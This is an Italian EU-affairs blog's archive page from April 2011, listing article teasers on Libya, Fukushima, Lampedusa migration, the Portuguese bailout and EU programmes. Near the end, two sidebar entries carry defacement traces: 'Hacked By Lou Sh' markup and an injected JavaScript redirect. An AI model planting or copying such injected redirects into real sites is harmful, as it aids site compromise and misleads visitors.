EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aprile 2011
it

Cerchiamo di concludere con questo intervento lo studio dei fattori e gli strumenti caratterizzanti la nostra politica estera a 150 anni dall'Unità anche se si rivelerebbe utile approfondire ancora più l'argomento.

L’Italia attualmente, come abbiamo potuto capire dagli interventi precedenti, è caratterizzata da una profonda debolezza che può essere ricondotta a due fattori: la crisi del sistema multilaterale e la difficoltà che si ha nell’intraprendere contatti con altri Paesi data la debolezza economica e (...)

it

Diverse le reazione all’evento da parte dei vari Stati membri. L’impatto emotivo si suddivide tra i paesi che non adottano o non contano più sull’energia nucleare (come l’Italia) e quelli che a tutt’oggi basano la propria produzione di energia sulla scissione dell’atomo. Tra questi la Francia e la Spagna continuano per la propria strada, mentre la Germania vira verso l’abbandono del nucleare.

L’episodio di Fukushima ha lasciato strascichi importanti riguardo l’uso dell’energia nucleare in Europa. La riunione straordinaria del Consiglio europeo dell’energia tenuta a Bruxelles lo scorso 21 marzo ha orientato l’U.E. verso l’esigenza di riuscire a capire la reale sicurezza delle proprie (...)

it

Il declino di Angela Merkel si configura come l’insuccesso di chi non riesce ad essere all'altezza del ruolo conquistato. "Una ragazza viziata, che ha paura della propria ombra", era stato già anni fa il commento lapidario che Helmut Kohl, suo padrino politico, aveva confessato ad un vecchio amico italiano.

Senza dubbio in quel commento vi era un’ombra di rammarico per averla promossa al vertice del Paese più importante d’Europa, proprio in virtù di quel suo basso profilo che l’aveva fatta preferire a concorrenti dalla personalità più forte e controversa. Ma un fatto è certo: molto probabilmente in (...)

it

"Il mondo non poteva assistere senza reagire alle molte vittime e alle distruzioni massicce inflitte dal leader libico alla sua stessa popolazione", ribadisce Napolitano, ricordando che "il capitolo 7 della Carta delle Nazioni Unite contempla specificamente l'uso della forza per mantenere la pace e la sicurezza internazionale. In Libia siamo impegnati a proteggere la popolazione civile e a far rispettare la carta delle Nazioni Unite, agendo nella piena legittimità internazionale conferita dalla Risoluzione 1973.”

NATO Con effetto immediato, la Nato è ufficialmente al comando e ha già nominato il generale canadese Charles Bouchard, alla guida delle operazioni militari dell’Alleanza Atlantica in Libia. Dopo l’accordo dei Ventotto la linea prende forma: una “no fly zone plus” (più aerei in campo, tra i 5 e i 10 (...)

it

Un’altra giornata all’insegna della sensibilizzazione per un uso più coscienzioso delle risorse naturali; questa volta dedicata al problema del riscaldamento globale. Lo scorso 26 Marzo, si è svolto il “Earth Hour”, l’ora della terra, e per un’ora il mondo è rimasto al buio. Centinai di città, ma anche piccoli centri, hanno spento le luci dei monumenti e edifici più importanti dalle 20.30 alle 21.30.

È la più grande iniziativa promossa dal WWF. L’idea nasce nel 2007, quando la prima città che spense tutte le luci fu Sidney; da quella prima esperienza, centinaia di Stati si sono negli anni uniti. Il 2011 è stato, però, un anno da record. Hanno partecipato più di 134 Paesi, più di un miliardo di (...)

it

Si sta diffondendo in questi giorni la notizia delle brutali soppressioni cui sono stati sottoposti i cani randagi in Spagna.

La cara splendida Spagna, terra in cui in molti vorrebbero ’’espatriare’’, non è poi così splendida. Secondo la legge Spagnola i cani randagi così come i gatti hanno solo 10 giorni al massimo 20 di vita. Vengono brutalmente soppressi con iniezioni dirette al cuore e per tenerli fermi durante (...)

it

Il Portogallo subisce la pressione dei mercati internazionali, che spingono per questi aiuti cercando di tutelare l’economia europea e mondiale. Ma dalla politica interna non arrivano buone notizie: le elezioni previste per la scelta del nuovo esecutivo non si svolgeranno prima di due mesi, e molti esponenti delle forze politiche hanno dichiarato la propria ostilità al piano di salvataggio. Diverse le sfumature di una crisi che potrebbe portare a gravi conseguenze per l’economia europea.

Dopo Grecia e Irlanda, l’U.E. deve fare i conti con una nuova crisi economica e finanziaria. Il Portogallo versa infatti da diversi anni in condizioni precarie, con un deficit pubblico in forte aumento ed una economia non in grado di opporsi a ciò risollevando il Paese. Il governo in carica (...)

it

Sono cambiate le procedure per richiedere gli assegni di maternità per il 2011. Quest’anno sarà possibile inviare la propria domanda via posta o attraverso un fax. Possibilità di fare richiesta fino al sesto mese di vita del bambino.

L’assegno di maternità, istituito con la legge 448 del 23/12/98, prevede che sia erogato dallo Stato un assegno, con un importo che viene valutato ogni anno, alle madri per una loro tutela e per un sostegno nel momento più felice si, ma anche più difficile per una donna. L’assegno che viene (...)

05
04
2011

ReCity (I parte)

it

Sta per iniziare, nell'ambito del programma Erasmus Mundus, un corso di formazione superiore Europeo.

Il master ReCity è un corso sulla rigenerazione delle città che è stato inserito all’interno del programma Erasmus Mundus. Negli interventi precedenti abbiamo presentato l’intero programma del’ Erasmus Mundus di quest’anno e abbiamo visto che questo si componeva di 14 master. Il recity è il 15°master (...)

it

Il mercato del gioco d'azzardo on-line è in forte crescita in tutti i paesi dell'UE, sono 15 milioni i siti ufficiali e non, per un'attività che ruota intorno ai 6 miliardi di euro. E' quindi necessario tutelare i cittadini dell'Unione Europea che cosi potranno far valere i proprio diritti come in un qualsiasi altro settore.

Il libro verde è un documento ufficiale dell’Unione Europea nel quale sono trascritte comunicazioni di carattere informativo e decisionale relative a particolari settori e questioni di pubblico interesse tra cui: il libro verde sulla gestione dei rifiuti organici,sui sistemi pensionistici,sul (...)

it

Seppur le prime due edizioni non hanno avuto il successo che ci si aspettava, la Commissione Europea non ha alcuna intenzione di mollare un progetto simile. L’ iniziativa “Frutta nelle Scuole” torna anche per il prossimo anno accademico 2011/2012, mentre quello attuale si sta per chiudere, a maggio.

Il progetto “Frutta nelle Scuole” è stato promosso la prima volta nel 2008/2009, con grande entusiasmo da parte della Commissione Europea. Purtroppo gli esiti non sono stati quelli sperati. Infatti, le adesioni, almeno nella prima edizione, sono state molto basse. Dei 90 milioni di euro (...)

06
04
2011

“Ecce homo”

it

“Siamo in un’epoca in cui le catene non sono portate ai piedi, ma alla motilità delle prime origini del nostro io e della nostra vita. Anche se apparentemente con altri sistemi, o meglio, con altri sistemi dal punto di vista dell’apparenza, l’Occidente sta, non lentamente, ma violentemente spingendo tutta la realtà umana, anche nostra, verso il “gulag” di un asservimento mentale e psicologico inaudito: la perdita dell’umano, di cui Teilhard de Chardin segnalava già il sintomo più impressionante, che è la perdita del gusto del vivere”.

“500”. A prima vista sembrerebbe il titolo del sequel creato sulla scia del celeberrimo film fantasy-storico di Zack Snyder, ma se lo si guarda più da vicino, più attentamente, si scopre che dello sfarzo del Grande Re Serse non c’è nessuna traccia. Se di similitudini si può parlare, c’è invece la (...)

it

In questa parte cercheremo di delineare il raggio d'azione di questo master sulla rigenerazione delle città.

La Commissione Europea attraverso l’Acea, responsabile anche del progetto Erasmus Mundus, ha portato alla realizzazione di un nuovo master, il ReCity. Abbiamo visto nell’intervento precedente sul tema che si tratta di un master della durata di 2 anni che conta 65 posti di iscrizione e mette a (...)

it

Per quali ragioni l’Europa è considerata come un argomento giornalistico “importante ma poco interessante”? Quali sono le problematiche che rendono difficile il rapporto tra istituzioni europee e corrispondenti da Bruxelles? Le logiche di funzionamento della macchina europea sono inconciliabili con le logiche mediali?

Questi sono gli interrogativi a cui ha cercato di dare una risposta il sociologo e dottore di ricerca in Teoria e Ricerca Sociale e Politica presso l’Università di Perugia, Alessio Cornia, nel suo libro intitolato Notizie da Bruxelles. Logiche e problemi della costruzione giornalistica (...)

it

I dati Eurostat attestano un lieve calo di disoccupazione in tutta Europa

Il primo dato che salta agli occhi è che l’UE sembra guarire dalla malattia-disoccupazione. Se già a fine 2010 abbiamo assistito ad un lieve calo, nei primi due mesi del 2011 il numero di occupati è in aumento in 13 Stati dell’Unione europea, ma c’è da evidenziare anche che la disoccupazione rimane (...)

it

Si tratta di un vera e propria frode ai danni dell'UE l'episodio che vede come protagonista una piccola impresa agricola di San Luca.I titolari dell'azienda hanno infatti abusato dei fondi per l'agricoltura stanziati dalla comunità. La truffa è l'ultima di una lunga serie e si fa sempre più forte la voce che richiede un immediato intervento da parte dell'UE.

Gli aiuti da parte dello Stato nel settore agricolo hanno acquistato un ruolo di grande rilievo nel corso degli anni per quanto riguarda lo sviluppo e la crescita economica del nostro Paese. Le richieste che giungono al vaglio della Commissione dalle piccole e grandi imprese agricole sono (...)

it

Circa un mese fa, ci eravamo già occupati, e preoccupati, dell’aumento dell’inflazione in Italia e in tutta l’Eurozona (articolo 6 marzo 2011). Passando in rassegna la situazione, avevamo chiuso l’articolo aspettando di vedere lo svolgersi degli eventi per stabilire se ci si doveva o no preoccupar e davvero. Ebbene, la situazione sembra non migliorare affatto. Anzi. Se a gennaio l’inflazione toccava il 2,2%, le nuove statistiche affermano che nell’area OCSE sale fino al 2,4%. Un record, più di un punto in più rispetto all’anno scorso, e una percentuale che non si vedeva dal 2008.

Sembra non ci sia da star tranquilli, l’inflazione aumenta. Indubbio è che tutto questo sia condizionato dalla difficile situazione libica, dove ormai tutta l’Europa è coinvolta. Schizzano i prezzi quindi dei carburanti, ma quello che ancora di più preoccupa è l’aumento dei generi alimentari. In (...)

it

Due automobilisti su tre sono d'accordo nell'introdurre questo nuovo piano volto ad aumentare la mobilità riducendo l'impatto ambientale.

Anche in Europa ci si preoccupa del problema ’’ inquinamento ambientale ’’. Dalla Commissione Europea è partito il piano UE 2050. Di cosa si tratta? Una nuova strategia volta a diminuire l’inquinamento ambientale senza ridurre la mobilità. Convinzione diffusa è sempre stata quella per cui, per cercare (...)

it

Le regioni italiane però sono ancora molto indietro sulla messa a punto degli immobili, e il tempo per la ratifica della direttiva varata dall’U.E. nel 2008 sta scadendo. Diversi i motivi con cui si può spiegare questo ritardo nella ricezione della direttiva U.E.

Il rapporto dell’O.M.S. e la direttiva U.E. Il recente rapporto dell’Organizzazione Mondiale della Sanità sull’impatto sanitario del rumore in Europa ha avuto modo di evidenziare come e quanto possa essere dannoso il frastuono provocato dal traffico per l’udito umano. Secondo questo studio infatti (...)

11
04
2011

Quante Lampedusa?

it

Migliaia di disperati hanno attraversato i nostri confini, non più come stranieri, abitanti di un mondo lontano e ostile,ma come cittadini d'Europa. Questa Patria, un tempo tanto invocata, che oggi è guardata con sospetto e lontananza: un atteggiamento tutto meritato,vista la nostra capacità di accoglienza divenuta famosa grazie al tempo.

Così sale la nostalgia del muro e dei confini. Perché il Mediterraneo, in fondo, era un valido confine: un ostacolo da affrontare per coloro che decidevano di sfidare la sorte e affrontare un viaggio disumano stipati su barche adatte a trasportare bestie, più che uomini. Oggi anche quel muro è (...)

it

Dopo 3 anni di progettazione nasce il gioco online che trasformerà ogni internauta, senza differenza di sesso, età e professione, in un abile scienziato pronto per il nobel. Attraverso un semplice sistema di gioco che rispecchia in molte parti la vita del ricercatore, l’UE prova a stimolare il popolo europeo. Bastano poche nozioni scientifiche di base ed il gioco è fatto, Einstein è avvisato.

“Power of Research” è il nuovo portale online che permette a chiunque ne abbia la voglia di cimentarsi nella scienza in tutte le sue sfaccettature. Sviluppato da TPM games (che ha già all’attivo un altro titolo serio, “Power of Politics”), e finanziato dall’UE, il gioco fa parte del settimo programma (...)

it

Aprile: mese che quest’anno ha visto come protagoniste importanti ricorrenze tra cui la celebrazione dell’Unità d’Italia ma anche la campagna di prevenzione alcologica, quest’ultima si sta svolgendo proprio in questi giorni. Evento che ci offre la possibilità di studiare dati relativi all'abuso di alcol in Italia e in Europa e che ci porta a riflettere sul grave problema dei danni che questo spesso provoca. Problema che con diverse sfumature riguarda diversi target di età.

Si è svolto il 07 aprile l’appuntamento principale : l’Alcohol Prevention Day. Questa giornata ormai giunta alla sua decima edizione è organizzata e finanziata dall’Istituto Superiore di Sanità, dall’Osservatorio Nazionale Alcol e dall’Organizzazione Mondiale della Sanità, in collaborazione con la (...)

it

Sono aperte, infatti, le selezioni per scegliere la ragazza che avrà l'onore di rappresentare l'Italia al G(irls)20 Summit 2011 che si terrà a Parigi in Ottobre.

“Le Delegate del G(irls)20 Summit sono ventuno giovani donne che si sono riunite per essere le catalizzatrici del cambiamento” ha dichiarato Belinda Stronach, fondatrice di The Belinda Stronach Foundation, la fondazione che ha organizzato il vertice. “Hanno l’opportunità di lavorare insieme per (...)

it

Da sempre l’uomo cerca di controllare la natura. Cerca di dare leggi e regole in modo che questa possa rispondere a qualsiasi sua esigenza. Quando, però, si parla di calamità naturali, trovare una soluzione per gestirle diventa un compito niente affatto facile. Lo scorso 5 e 6 Aprile, nel workshop tenutosi a Pavia, si è provato a dare una risposta a questo problema.

Il workshop, durato due giorni 5 e 6 Aprile, a Pavia, ha avuto lo scopo di illustrare e presentare i progressi scientifici e tecnologici che sono stati fatti per il “controllo” dei fenomeni naturali. Le menti più illustri di questo settore, si sono incontrate presso la Fondazione Eucentre, centro (...)

it

La Microsoft ha mosso accuse di anti competitività al motore di ricerca e la Commissione Europea è chiamata a esprimere giudizio a riguardo.

La Commissione Europea per l’antitrust in questi giorni è stata chiamata in causa per giudicare le accuse che la Microsoft ha mosso verso il motore di ricerca dominante in Europa: Google. L’ antitrust è l’organo che vigila sull’osservanza e il rispetto delle norme. Cosa a cui, secondo i colossi (...)

it

Siamo alla solite: l’Italia è l’unico paese in cui le emissioni, invece di diminuire, sono aumentate. Il Paese delle contraddizioni, che gonfia il petto dei propri cittadini al solo pensiero della sconfinata tradizione culturale, non perde quasi mai l’occasione di farci arrossire di fronte ai nostri “vicini di casa”. Il Belpaese della “dolce vita”, della Commedia, del cibo genuino e della moda, in un batter di ciglia si trasforma nella macchina infernale di diossina e benzopirene. Il dottor Jekyll che strizza l’occhio al suo malvagio alterego Hyde. Non si fa in tempo a metabolizzare i rimproveri per l’incuria dei siti archeologici( vedi Pompei e il più recente crollo del parapetto nell’isola di Capri), che la Corte europea di Giustizia di Lussemburgo condanna l'Italia per la fallita applicazione entro i termini della direttiva Ue Ippc, sulla prevenzione e la riduzione dell'inquinamento industriale. Stando alle statistiche di Bruxelles dunque, l’Italia non rispetterebbe gli obblighi comunitari sulle industrie inquinanti. Inoltre anche il dossier Kyoto del 2008, realizzato dalla Fondazione per lo sviluppo sostenibile, mostra che tra i paesi industrializzati aderenti all’omonimo protocollo l’Italia risulta all’ultimo posto, posizione giustamente occupata da chi non ha preso alcun tipo di provvedimento per la riduzione dell’inquinamento. Sempre secondo questi dati, Gran Bretagna e Germania sono state le nazioni che più si sono attrezzate per ridurre e in molti casi abbattere le emissioni. Nel nostro Paese la situazione è diversa: ad oggi molti impianti industriali continuano ad emettere inquinanti in aria, suolo e acqua, non rispettando così i dictat comunitari.

La direttiva sulle emissioni inquinanti L’inchiesta è iniziata nel 2005 quando la Commissione ha attirato l’attenzione degli Stati membri sull’esigenza di rispettare determinati termini. Nello specifico la direttiva europea obbligava gli Stati membri ad usare, entro il 30 ottobre 2007, le misure (...)

it

Si rinnova anche per quest’anno il tradizionale appuntamento promosso dal Ministero per i Beni e le Attività Culturali . L’evento in corso di svolgimento dal 9 al 17 aprile offre la possibilità d’ingresso gratuito o ridotto all’interno di musei, mostre e siti archeologici, oltre all’organizzazione di iniziative storiche, artistiche e culturali e con ampi riferimenti ai 150 anni dell’Unità d’Italia.

Riappropriarsi del patrimonio culturale italiano Non poteva mancare nel corso della ricorrenza dei centocinquant’anni dall’Unità d’ Italia un evento per promuovere e conoscere meglio la cultura del nostro Paese. L’occasione comunque era già fissata in precedenza, perché come ogni anno infatti il (...)

it

Ancora un' opportunità di formazione per i giovani laureati europei. Il CEDEFOP, promuove tirocini di nove mesi per giovani che, mentre imparano, cominciano a muovere i primi passi nel mondo del lavoro.

Il CEDEFOP, centro per lo Sviluppo della Formazione Professione, nasce nel 1975, col compito di promuovere e sviluppare l’istruzione professionale dell’Unione Europea. È il primo centro nato per garantire le relazioni tra gli Stati membri europei in ambito lavorativo e scientifico. Berlino fu la (...)

it

L’estate è ormai alle porte: e in questo periodo dell’anno sopratutto per i giovani inizia l’atteso periodo di vacanza e divertimento. Questo binomio può diventare perfetto grazie all’AEGEE SUMMER UNIVERSITY. Con questo progetto i ragazzi hanno l’opportunità di viaggiare, incontrare studenti di altre nazioni, conoscere nuove culture, perfezionare le lingue, praticare dello sport all’aria aperta.

L’AEGEE(Association des Etats Généraux des Etudiants de l´Europe) è ad oggi la più grande associazione per gli studenti con sede a Bruxelles che collabora attivamente con tutti i governi e le istituzioni europee. Ed il progetto di scambio culturale di questa associazione più noto tra i giovanissimi è (...)

it

Si tratta di una vetrina molto interessante per qualunque autore che voglia mettere al servizio del lavoro d’impresa il proprio talento nell’audiovisivo, nell’animazione, nel 3D, nel Web, nel Web design e nel gaming. L’unica restrizione, oltre ai campi su cui operare, riguarda l’età che deve essere compresa tra i 22 e i 35 anni. Ecco dunque una delle controffensive alla disoccupazione.

La città di Torino, in collaborazione con la Camera di Commercio della provincia e della regione Piemonte, presenta ai giovani italiani per la seconda volta la possibilità di partecipare al concorso per autori intitolato: “Faber:quando la creatività incontra l’impresa”. Il concorso, aperto dal 7 (...)

it

Ha preso il via la quinta stagione del concorso, promosso dalla fondazione Pubblicità Progresso in collaborazione con il Parlamento Europeo.

Tutti i giovani universitari e non, che credono nella comunicazione sociale e nella sua importanza per la società, possono partecipare al concorso On the move 2011. Il concorso è nato dalla collaborazione tra la fondazione Pubblicità Progresso e il Parlamento Europeo con lo scopo di coinvolgere (...)

it

The best is yet to come. Il meglio deve ancora venire. Siamo arrivati a circa un mese dall’inizio degli sbarchi dei migranti provenienti dal Nord Africa in rivolta e l’Europa comincia a dar segni di vivo interesse circa questo fenomeno. Tra l’Italia e l’Unione è incominciata una partita serrata in un botta e risposta, che come in un grande match, vede la palla rimbalzare da una parte all’altra senza interruzioni.

Il merito di aver riportato la questione immigrazione al centro del dibattito europeo è del Presidente del Consiglio italiano Silvio Berlusconi. Il 9 aprile, nella sua seconda visita all’isola di Lampedusa, meta di arrivo dei migranti, il Premier italiano è tornato a bacchettare l’Europa, in (...)

it

Dalla centrale di Onagawa sono state registrate delle perdite d’acqua che la Tohoku Electric, società che gestisce l’impianto, non considera pericolose: il livello di radioattività all’esterno della struttura non risulta cambiato dalla sfortunata data dell'11 Marzo. Non sono stati segnalati problemi per la centrale di Fukoshima, ma nonostante le notizie tutto sommato confortanti, in Europa rimane alto il livello d’attenzione sui pericoli della contaminazione.

L’Health Protection Agency (HPA), lncia l’allarme: le radiazioni del disastro nucleare di Fukushima, arrivano in Europa. L’agenzia ha rilevato infatti nelle ultime due settimane una preoccupante presenza di iodio nell’aria nella stazione di Oxfordshire in Inghilterra e Glasgow in Scozia, chiarendo (...)

it

Perché l’”Europa”, di cui si innamorò persino Zeus al punto da rapirla sotto la veste di uno sfolgorante toro bianco, oggi è così maltrattata? Perché le sue notizie sono noiose e non c’è un’identità europea comune? Queste sono le domande che balzano da un microfono all’altro nella settimana perugina dedicata al giornalismo internazionale. Precisamente dal 13 al 17 aprile il capoluogo umbro ha ospitato molti giornalisti e non, con l’intento di tracciare le linee guida di questo mestiere nell’era dell’informazione e della comunicazione.

Nomi di fama mondiale, uno splendido paesaggio, migliaia di giovani, tutto a condire il paradiso del giornalismo e del networking. Nell’aria si respira il bisogno di un’informazione più accurata, una dimostrazione che la partecipazione va al di là della pericolosa crisi delle democrazie (...)

it

È successo di nuovo. Altro referendum, altro rifiuto dalle popolazione islandese di pagare con soldi pubblici i debiti contratti con Olanda e Inghilterra. Il suo ingresso nell’UE diventa, quindi, sempre più lontano. La nazione paga, così, le colpe del settore finanziario

Il commento lapidario, esplicativo della situazione, arriva da Sylvester Eijffinger, professore dell’Università di Tilburg e consigliere di vecchia data del governo olandese e del Ministro dell’Economia. “Penso che in questo momento non vi sia alcun modo per l’Islanda per entrare a far parte (...)

it

Il Parlamento Europeo ha approvato con una maggioranza di centro-sinistra, e per soli 8 voti di differenza (314 favorevoli, 306 contrari e 48 astenuti) la Relazione Guillaume che emenda la proposta di Direttiva della Commissione europea sulle "Norme minime per le procedure applicate negli Stati (...)

it

Il nostro bel Paese può vantare un altro primato: infatti in Italia gli impianti eolici costano in media 113 euro per MWh, contro i 68 della Spagna, i 65 della Germania e i 79 euro della media europea. Questi dati emergono dal recente rapporto IREX (Italian Renewables Index) 2011, ovvero l’indice che tiene sotto controllo l’andamento in Borsa delle società quotate il cui business è basato sulle energie rinnovabili.

Il rapporto spiega anche che i maggiori costi italiani sono causati da un insieme di fattori: “la complessa orografia, il vento meno costante, ma anche minori incentivi, prezzi delle tecnologie superiori, prestiti bancari più cari, tempi di autorizzazione incerti” e Comuni che molto spesso (...)

21
04
2011

Green Emotion

it

Il piano UE per i trasporti cerca di ridurre l'inquinamento ambientale con una serie di iniziative volte ad eliminare l'emissione di CO2. Come?

Nell’intervento precedente sul piano trasporti UE abbiamo visto le iniziative che la Commissione Europea cercherà di attuare entro il 2050. Più treni meno auto, creare migliori collegamenti tra i porti marittimi e tra le reti ferroviarie e cercare di eliminare del tutto entro il 2050 le auto ad (...)

it

Un altro primato spetta alla Francia da oggi. E' infatti il primo Paese europeo a imporre il divieto di indossare il velo islamico integrale nei luoghi pubblici (una misura simile è in corso d'adozione anche in Belgio, ma non entrerà in vigore prima della primavera del 2011). Il divieto entrerà in vigore entro i prossimi sei mesi, se la legge passerà l'esame dei giudici costituzionali.

Le donne che insisteranno a indossare il burqa o il niqab dovranno pagare una multa di 150 euro, o seguire uno stage di "educazione civica". Chiunque invece obblighi una donna a coprirsi completamente rischierà un anno di carcere e 30 mila euro di multa. Erroneamente si pensa che tale velo sia (...)

it

In Romania, se il Parlamento romeno approverà la nuova legge, circa 2 milioni di cani randagi malati potrebbero essere uccisi tramite iniezione letale; In Italia le segnalazioni di cani pesantemente maltrattati o massacrati sono state, solo nel 2010, 24.445 (67 al giorno). In Spagna è legale l’uccisione sistematica di cani nelle Perreras; la legge autorizza la soppressione dei cani, anche cuccioli, dopo solo 10 giorni di permanenza.

In Europa i cani randagi sono stimati tra i 6 e gli 8 milioni di esemplari. Nelle Perreras spagnole, veri e propri canili lager, gli animali vengono bruciati vivi o fatti sparire; e sono i comuni o i singoli cittadini, per sbarazzarsi dei cani di troppo, a pagare i proprietari di queste (...)

it

Cina. Italia. G-20. Tre parole che rievocano scenari da guerra fredda. Molto è trascorso da quel periodo, in cui gli intrecci politici nel mondo comunista facevamo tremare la coscienza occidentale e le relazioni con il “mondo capitalista” erano torbide. Di quegli anni rimangono le infrastrutture e gli investimenti pianificati sovietici che hanno permesso alla Cina e agli altri paesi "terzomondisti" di diventare importanti attori all’interno del consesso dei principali stati mondiali, il G-20.

Di come il mondo sia cambiato e si stia trasformando giorno dopo il giorno, il Ministro dell’Economia italiano Giulio Tremonti ne ha dato in questi giorni una acuta analisi: ’’Il G20 è invecchiato. Non c’è l’Africa, c’è solo l’Africa del Sud. Non c’è il mondo arabo, c’è solo l’Arabia Saudita. La (...)

it

Nel Parlamento Rumeno nei giorni scorsi è stata presentata una nuova proposta di legge che prevede la soppressione di tutti i cani randagi del paese entro il 2011.

I nostri amici a quattro zampe sono in pericolo. Dopo le vicende che hanno interessato la Spagna per le brutali uccisioni dei randagi, una situazione analoga si presenta a Bucarest. Tutto nasce dalla morte di un giapponese attaccato da un cane randagio. Per porvi rimedio e per risolvere la (...)

it

La carica di primo ministro verrà assegnata al leader conservatore Jyrki Katainen, che potrebbe formare il suo nuovo governo avvalendosi dell’appoggio della destra xenofoba e euroscettica: una ipotesi che preoccupa molto Bruxelles considerando l’importanza della Finlandia nella questione immigrati e nell’approvazione di piani di salvataggio finanziario per paesi in difficoltà economica come il Portogallo.

La Finlandia svolta a destra? Le elezioni politiche svoltesi domenica 18 aprile hanno sancito infatti la sconfitta del premier Mari Kiviniemi, che esce bruscamente ridimensionata dalla consultazione. Il suo partito di centro infatti è crollato, ottenendo solo il 15,8% delle preferenze e (...)

26
04
2011

Linea Amica

it

E' stata presentata il 14 aprile dal Ministro Renato Brunetta il nuovo portale virtuale di Linea Amica, che si è già guadagnato il soprannome di "Nuovo google della Pubblica Amministrazione"

Che Renato Brunetta, nostro Ministro della Pubblica Amministrazione, volesse lanciare un segnale forte per migliorare il rapporto tra la P.A. e i cittadini era chiaro fin dall’inizio della sua legislazione. Nel 2009 in Italia, in base alle nuove direttive dell’UE, è stata realizzata LINEA AMICA: (...)

27
04
2011

Pedine in gioco

it

Nel messaggio Urbi et orbi al termine della messa di Pasqua, Il Papa ha rivolto il suo pensiero "ai tanti profughi e ai rifugiati, che provengono da vari Paesi africani e sono stati costretti a lasciare gli affetti più cari". " A loro arrivi la solidarietà di tutti; gli uomini di buona volontà siano illuminati ad aprire il cuore all'accoglienza, affinché in modo solidale e concertato si possa venire incontro alle necessità impellenti di tanti fratelli".

Sbarchi a Lampedusa Dopo una breve tregua, sono ripresi gli sbarchi di migranti a Lampedusa: nella scorsa settimana sono sbarcati i 221 profughi originari del centro Africa e dall’Asia e provenienti dalla Libia che hanno attraversato il Canale di Sicilia con il mare in tempesta. 60 tunisini (...)

it

Un fulmine a ciel sereno. Questa è stata la notizia dell’Opa avanzata da Lactalis, uno dei più grandi gruppi industriali del settore agroalimentare. L’offerta, al prezzo di 2,6 euro ad azione, ha scombussolato i piani di Tremonti, che si era eretto paladino della crociata contro gli interventi di aziende straniere, prefigurando un durissimo colpo all’”italianità” dell’economia. Nell'insieme Lactalis è pronta a mettere sul tavolo 4,8 miliardi per acquisire le azioni che già in parte possiede. Intanto, dopo la momentanea sospensione, Parmalat è stata riammessa in Borsa e le sue azioni, dopo la notizia dell’Opa francese, sono salite ad un +11,59%, a 2,58euro.

Siamo così sicuri di poter festeggiare tranquillamente i nostri 150 anni di unità? L’impressione infatti è che mentre il Belpaese va avanti a colpi di barzellette e picconate al 25 aprile, c’è chi in Europa fa i fatti. Il gruppo francese, che solo due mesi fa era salito al 29% di Parmalat comprando (...)

it

Pace fatta tra Italia e Francia.Un clima più che favorevole ha fatto da cornice all'ultimo vertice tra le due delegazioni Europee. Molte le vicende trattate, non solo lo scenario Libico ma anche immigrazione, economia e accordi politici.

’’Tra Italia e Francia ci sono state delle tensioni, non ha importanza di chi sia la colpa. Non hanno motivo di esistere!’’. Si è aperto con queste parole l’incontro tra Berlusconi e Sarkozy. Così l’Italia e la Francia si mostrano di nuovo unite e solidali dopo le polemiche che le avevano coinvolte nei (...)

it

Mentre le associazioni ambientaliste ricordano l’evento con diverse iniziative a favore dell’energia sicura, gli effetti dell’incidente ancora si fanno sentire: Ucraina, Russia e Bielorussia chiedono fondi per la costruzione di un nuovo sarcofago in grado di sostituire quello vecchio, scongiurando le fuoriuscite di materiale radioattivo dalla centrale.

Erano l’1:23 del 26 aprile 1986, un’ora e una data destinate a contrassegnare per sempre la storia dell’energia nucleare nel mondo. Perché accadde quello che tutti temevano, il rovescio della medaglia di un simile uso di questa particolare risorsa energetica, un incidente senza precedenti destinato (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France